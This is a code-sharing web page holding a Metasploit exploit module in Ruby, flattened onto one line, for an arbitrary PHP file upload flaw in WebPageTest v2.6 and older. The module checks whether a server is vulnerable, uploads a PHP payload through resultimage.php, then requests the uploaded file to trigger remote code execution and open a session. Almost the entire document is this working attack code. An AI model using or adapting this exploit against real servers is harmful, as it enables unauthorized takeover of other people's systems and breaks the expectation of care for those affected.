扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 |
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "WebPageTest Arbitrary PHP File Upload", 'Description'=> %q{ This module exploits a vulnerability found in WebPageTest's Upload Feature. By default, the resultimage.php file does not verify the user-supplied item before saving it to disk, and then places this item in the web directory accessable by remote users.This flaw can be abused to gain remote code execution. }, 'License'=> MSF_LICENSE, 'Author' => [ 'dun',#Discovery, PoC 'sinn3r'#Metasploit ], 'References' => [ ['OSVDB', '83822'], ['EDB', '19790'] ], 'Payload'=> { 'BadChars' => "\x00" }, 'DefaultOptions'=> { 'ExitFunction' => "none" }, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Targets'=> [ ['WebPageTest v2.6 or older', {}] ], 'Privileged' => false, 'DisclosureDate' => "Jul 13 2012", 'DefaultTarget'=> 0)) register_options( [ OptString.new('TARGETURI', [true, 'The base path to WebPageTest', '/www/']) ], self.class) end def check peer = "#{rhost}:#{rport}" target_uri.path << '/' if target_uri.path[-1,1] != '/' base = File.dirname("#{target_uri.path}.") res1 = send_request_raw({'uri'=>"#{base}/index.php"}) res2 = send_request_raw({'uri'=>"#{base}/work/resultimage.php"}) if res1 and res1.body =~ /WebPagetest \- Website Performance and Optimization Test/ and res2 and res2.code == 200 return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def on_new_session(cli) if cli.type != "meterpreter" print_error("No automatic cleanup for you. Please manually remove: #{@target_path}") return end cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi") cli.fs.file.rm(@target_path) print_status("#{@target_path} removed") end def exploit peer = "#{rhost}:#{rport}" target_uri.path << '/' if target_uri.path[-1,1] != '/' base = File.dirname("#{target_uri.path}.") p = payload.encoded fname = "blah.php" data = Rex::MIME::Message.new data.add_part( "<?php #{p} ?>", #Data is our payload 'multipart/form-data', #Content Type nil, #Transfer Encoding "form-data; name=\"file\"; filename=\"#{fname}\""#Content Disposition ) print_status("#{peer} - Uploading payload (#{p.length.to_s} bytes)...") res = send_request_cgi({ 'method' => 'POST', 'uri'=> "#{base}/work/resultimage.php", 'ctype'=> "multipart/form-data; boundary=#{data.bound}", 'data' => data.to_s }) if not res print_error("#{peer} - No response from host") return end @target_path = "#{base}/results/#{fname}" print_status("#{peer} - Requesting #{@target_path}") res = send_request_cgi({'uri'=>@target_path}) handler if res and res.code == 404 print_error("#{peer} - Payload failed to upload") end end end |
体验盒子
